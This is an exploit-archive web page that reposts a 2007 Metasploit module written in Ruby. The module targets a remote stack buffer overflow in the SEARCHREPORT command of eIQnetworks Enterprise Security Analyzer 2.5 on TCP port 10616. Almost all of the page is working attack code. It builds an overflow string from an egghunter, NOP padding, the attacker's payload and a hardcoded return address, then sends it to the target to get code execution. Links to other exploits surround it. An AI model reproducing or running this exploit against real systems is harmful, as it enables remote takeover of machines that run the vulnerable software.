首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
eIQnetworks ESA SEARCHREPORT Remote Overflow Exploit (meta)
来源:ri0t[at]ri0tnet.net 作者:ri0t 发布时间:2007-10-24  
##
# $Id: eiqnetworks_esa.rb 4529 2007-03-12 01:08:18Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Misc::Eiqnetworks_SEARCHREPORT < Msf::Exploit::Remote

include Exploit::Remote::Tcp
include Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name'           => 'eIQNetworks ESA SEARCHREPORT Overflow',
'Description'    => %q{
This module exploits a stack overflow in eIQnetworks
Enterprise Security Analyzer. During the processing of
long arguments to the SEARCHREPORT command, a stack-based
buffer overflow occurs.
},
'Author'         => [ 'ri0t <ri0t[at]ri0tnet.net>',   ],
'Version'        => '$Revision: 4529 $',
'References'     =>
[
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload'        =>
{
'Space'    => 1962,
'BadChars' => "\x00",
'ActiveTimeout' => 15,
},
'Platform'       => 'win',

'Targets'        =>
[
['EnterpriseSecurityAnalyzer v2.5 Universal', { 'Ret' => 0x55322a6a, 'Offset' => 1962 } ], 

],

'Privileged'     => false,

                        'DisclosureDate' => ''

                        ))

register_options(
[
Opt::RPORT(10616)
], self.class)
end

def exploit
connect

print_status("Trying target #{target.name}...")

hunter = generate_egghunter()
egg = hunter[1]
filler =  make_nops(target['Offset'] - payload.encoded.length)
sploit =  "SEARCHREPORT&" + egg + egg + filler + payload.encoded + make_nops(12) + [target.ret].pack('V') + make_nops(12) + hunter[0] +  "&";
puts sploit
sock.put(sploit)
handler
disconnect
end

end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle 10g CTX_DOC.MARKUP SQL
·Jakarta Slide <= 2.1 RC1 Remot
·DNS Recursion bandwidth amplif
·IBM Tivoli Storage Manager 5.3
·Mozilla Firefox <= 2.0.0.7 Rem
·IBM Lotus Domino 7.0.2FP1 IMAP
·PHP 5.x COM functions safe_mod
·GOM Player 2.1.6.3499 (GomWeb3
·Apache Tomcat (webdav) Remote
·Sony CONNECT Player 4.x (m3u F
·BBPortalS <= 2.0 Remote Blind
·Kodak Image Viewer TIF/TIFF Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved